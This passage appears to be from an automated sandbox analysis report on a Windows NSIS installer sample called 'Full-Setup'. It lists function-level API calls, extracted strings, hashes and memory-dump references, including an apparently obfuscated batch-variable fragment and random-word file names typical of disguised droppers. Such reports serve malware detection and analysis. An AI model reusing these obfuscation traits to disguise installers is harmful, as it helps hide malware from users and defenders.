CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

Error launching installer, xrefs: 00403AA9
_?=, xrefs: 00403A90
~nsu.tmp, xrefs: 00403B23
/D=, xrefs: 004039D2
SeShutdownPrivilege, xrefs: 00403C42
NSIS Error, xrefs: 0040390E
\Temp, xrefs: 00403A47
NCRC, xrefs: 004039A8

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
SetFileAttributes failed., xrefs: 004017A1
Sleep(%d), xrefs: 0040169D
Call: %d, xrefs: 0040165A
CreateDirectory: "%s" (%d), xrefs: 004017BF
CreateDirectory: "%s" created, xrefs: 00401849
Aborting: "%s", xrefs: 0040161D
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Rename: %s, xrefs: 004018F8
Jump: %d, xrefs: 00401602
BringToFront, xrefs: 004016BD
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Rename failed: %s, xrefs: 0040194B
Rename on reboot: %s, xrefs: 00401943
detailprint: %s, xrefs: 00401679

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

@jG, xrefs: 00405AF2
RichEdit20A, xrefs: 00405BE2, 00405BE7
"F, xrefs: 00405A4B
F, xrefs: 00405A22
RichEdit, xrefs: 00405BF0
.DEFAULT\Control Panel\International, xrefs: 004059C5
RichEd32, xrefs: 00405BD4
RichEd20, xrefs: 00405BC9
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
.exe, xrefs: 00405A69
_Nb, xrefs: 00405AFD

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,ExteriorGeographyWaterUniversities,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,ExteriorGeographyWaterUniversities,ExteriorGeographyWaterUniversities,00000000,00000000,ExteriorGeographyWaterUniversities,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427773,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user abort, xrefs: 00401B53
File: error, user retry, xrefs: 00401B40
ExteriorGeographyWaterUniversities, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: wrote %d to "%s", xrefs: 00401BD0
File: error creating "%s", xrefs: 00401AF0
File: error, user cancel, xrefs: 00401B93

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: ExteriorGeographyWaterUniversities$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-1297425327
Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Null, xrefs: 004036AA
Error launching installer, xrefs: 00403603
soft, xrefs: 004036A1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Inst, xrefs: 00403698

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,00427773,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

Set Mph=aecIQAssist-Para-HlDPassport-Labels-TLQCassette-Privileges-Bbw-Solving-Except-Bosnia-PprmPublishing-Terror-Semi-Documentary-Lists-Maximum-Deutschland-Arrangements-LBOWal-Risks-Fortune-Headers-Booty-Indiana-Hard-Employers-ClYFi-Pty-Framing-D, xrefs: 004033FD
pAB, xrefs: 004033AB
... %d%%, xrefs: 004034C8
swB, xrefs: 0040346F, 0040348A, 00403513

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$Set Mph=aecIQAssist-Para-HlDPassport-Labels-TLQCassette-Privileges-Bbw-Solving-Except-Bosnia-PprmPublishing-Terror-Semi-Documentary-Lists-Maximum-Deutschland-Arrangements-LBOWal-Risks-Fortune-Headers-Booty-Indiana-Hard-Employers-ClYFi-Pty-Framing-D$pAB$swB
API String ID: 651206458-1625036649
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,00427773,74DF23A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427773,74DF23A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNELBASE(006887D8), ref: 00402387

Strings

ExteriorGeographyWaterUniversities, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8

Memory Dump Source

